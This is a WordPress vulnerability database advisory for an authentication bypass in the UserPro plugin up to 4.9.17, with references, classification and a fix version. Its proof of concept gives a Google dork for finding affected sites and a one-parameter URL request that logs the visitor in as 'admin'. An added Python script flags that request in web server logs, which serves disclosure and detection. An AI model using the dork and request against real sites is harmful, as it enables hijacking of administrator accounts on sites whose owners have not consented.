UserPro <= 4.9.17 - Authentication Bypass
Description
The UserPro plugin allows login authentication to be bypassed for the user 'admin'. If the site does not use the standard username 'admin' it is not affected.
Proof of Concept
1 - Google Dork inurl:/plugins/userpro

2 - Browse to a site that has the userpro plugin installed.

3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true

4 - If the site has a default 'admin' user you will now see the WordPress admin menu at the top of the site. You are now logged in with full administrator access.
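A log-side check for this advisory, added here as an example and not part of the WPVDB entry: it parses combined-format web server access log lines (constructed samples, not real traffic) and flags any request carrying the up_auto_log query parameter from step 3, percent-decoding parameter names and ignoring the string when it only appears as another parameter's value, which a plain grep would not do.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" log format (documentation IPs).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2017:10:01:02 +0000] "GET /?up_auto_log=true HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Nov/2017:10:01:05 +0000] "GET /blog/?page_id=2&up_auto_log=true HTTP/1.1" 200 5120 "-" "curl/7.58"
192.0.2.9 - - [10/Nov/2017:10:02:11 +0000] "GET /?s=up_auto_log HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Nov/2017:10:02:30 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Nov/2017:10:03:00 +0000] "GET /?up%5Fauto%5Flog=true HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Minimal combined-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# The parameter name the advisory's PoC appends to the site root.
SUSPICIOUS_PARAM = "up_auto_log"


def has_up_auto_log(target: str) -> bool:
    """True if the request target's query string carries the up_auto_log parameter.

    parse_qs percent-decodes names, so up%5Fauto%5Flog is matched too, while
    '?s=up_auto_log' (the string as a *value*) is not a hit.
    """
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return SUSPICIOUS_PARAM in params


def scan_log(text: str) -> list:
    """Return one record per request that carries the up_auto_log parameter."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        if has_up_auto_log(m["target"]):
            params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                         "status": int(m["status"]),
                         "value": params[SUSPICIOUS_PARAM][0]})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        # A 302 on the PoC request is consistent with the auto-login redirect; any
        # value of the parameter is worth investigating, not only "true".
        print(f"{h['ts']} {h['ip']} {h['target']} -> {h['status']} (up_auto_log={h['value']})")
```

Run it against the real access log with `scan_log(open(path).read())`; hits from before the upgrade to 4.9.17.1 warrant checking the admin account's sessions and recent changes.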

Affects Plugin

Fixed in version 4.9.17.1

References

CVE 2017-16562
EXPLOITDB 43117
URL https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Submitter Colette Chamberland, Iain Hadgraft
Submitter Twitter cjchamberland
Views 5194
Verified No
WPVDB ID 8950

Timeline

Publicly Published 2017-11-10 (about 2 years ago)
Added 2017-11-12 (about 2 years ago)
Last Updated 2019-11-01 (about 1 month ago)